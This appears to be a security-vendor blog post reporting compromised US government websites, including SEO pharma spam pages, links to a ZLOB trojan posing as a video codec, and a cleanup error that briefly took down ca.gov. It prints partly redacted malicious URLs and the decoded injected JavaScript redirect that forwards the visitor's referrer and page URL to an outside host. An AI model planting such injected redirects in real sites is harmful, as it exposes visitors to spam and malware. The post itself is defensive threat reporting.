We’ve told you this before and we’re saying it again. Nobody’s safe.

A hacker managed to compromise a California county Web site to redirect visitors to some porn site. The LA Times and Network World report that the corrective procedures did not turn out so great; a personnel from a segment of the U.S. General Services Administration in Washington, who oversees the .gov domain, accidentally wiped out the entire ca.gov domain in response. This was not the intention, of course. However, its effects grew more massive as night drew near. Employees were unable to access certain Web sites, and worse, to exchange email messages. Down time was less than half a day, but the entire thing prompted a talk between the California and Washington IT teams regarding communication plans for changes as big as the foregoing.

Note that the ca.gov domain itself was not compromised, and that it was the corrective action that caused the entire thing to go down. Still, this should wake the authorities up about cleaning the codes residing in .gov domains as they are especially prone to abuse by malware authors looking to plant malicious content. This despite the pervading idea that educational and government institutions, which put up non-financial information on their Web sites, are hardly good targets for malware authors. Although there seems to be no motivation to test their sites for possible exploitation because no actual monetary value is at risk, malware authors are looking at these sites as easy targets, proven months ago by Trend Micro researches who have been able to discover at least two government Web sites abused by an SEO (search engine spam) spammer. The said sites had pages urging viewers to purchase certain pharmaceutical products.

And for us at the security industry, to quote Trend Micro’s Network Architect Paul Ferguson, “We’ve been banging the right drum, for the right reason, for a long time now.” For truly there is no end to the dangers and annoyances — collateral or otherwise — that these hackers can bring.

Sadly, the spate continues. Chalk another one up for this Arizona .gov site laced with links leading to malware downloads. The URL http://{BLOCKED}.azgu.gov/pupt.asp?Parkid=223 has been found by Trend Micro analysts to carry the following links:

* http:// {BLOCKED}n.shopmedic. info/
* http:// {BLOCKED}s.shopmedic. info/
* http:// {BLOCKED}b.shopmedic. info/

All of the said malicious links lead to the following:

When the continue button is clicked, the browser loads http://{BLOCKED}oft. com/download/502/541/1/, which downloads http://{BLOCKED}oft.com /soft/ temp/502_16c222a_ 1/VideoAccessCodecInstall.exe:

Good thing Trend Micro already detects this as TROJ_ZLOB.DZW. The variants of the ZLOB family, known for posing as video codecs, are notorious downloaders.

Porn and viagra redirects (as are the fare for recent hacks) are one thing, but malware downloads reek of a more sinister intent.

Nobody has learned, apparently, considering the attacks the past few days, one ca.gov county site and one superior court site. Hacked legitimate Web sites pose the greatest danger to Internet users today, since attacks like these conveniently dispose of the “hard-and-fast” browsing dictum: to never visit untrusted sites. Now it doesn’t matter where you surf; what matters are the tools you have to protect your browsing experience.

Authorities have been duly notified for site mitigation.

Thanks also to Trend Micro Researcher Erbert Ancheta and Michael Cortes for the additional info.

Something’s hot in California and it’s not Angelina. Barely two days since a CA .gov site has been confirmed to be hacked, Trend Micro received reports that another CA county .gov Web site is deep in porn trouble. The jury section of the Tulare superior court Web site http://www. tularesuperiorcourt.ca.gov/jury/ has been compromised, spouting such pages as:

* http://www. tularesuperiorcourt.ca.gov/jury/propecia.html
* http://www. tularesuperiorcourt.ca.gov/jury/meridia.html
* http://www. tularesuperiorcourt.ca.gov/jury/valium.html
* http://www. tularesuperiorcourt.ca.gov/jury/xanax.html
* http://www. tularesuperiorcourt.ca.gov/jury/adipex.html
* http://www. tularesuperiorcourt.ca.gov/jury/levitra.html
* http://www. tularesuperiorcourt.ca.gov/jury/cialis.html

Below is a screenshot of one of the said compromised pages:



The encrypted tag inserted into the hacked page decodes to:

window.location=(”http://{BLOCKED}yurls.com/in.cgi?2&seoref=”+encodeURIComponent(document.referrer)+�Ã�¶meter=&se=&ur=1&HTTP_REFERER=�+enc odeURIComponent(document.URL)+”&default_keyword={CBOSKEYWORD}”);

…ultimately, leading to the site http://{BLOCKED}yurls.com/in.cgi?. As of this writing, the said page redirects to another side and displays the following:



Trend Micro has duly notified the proper authorities and is working with US-CERT to mitigate this attack.

Further analysis provided by Trend Engineer Benson Sy.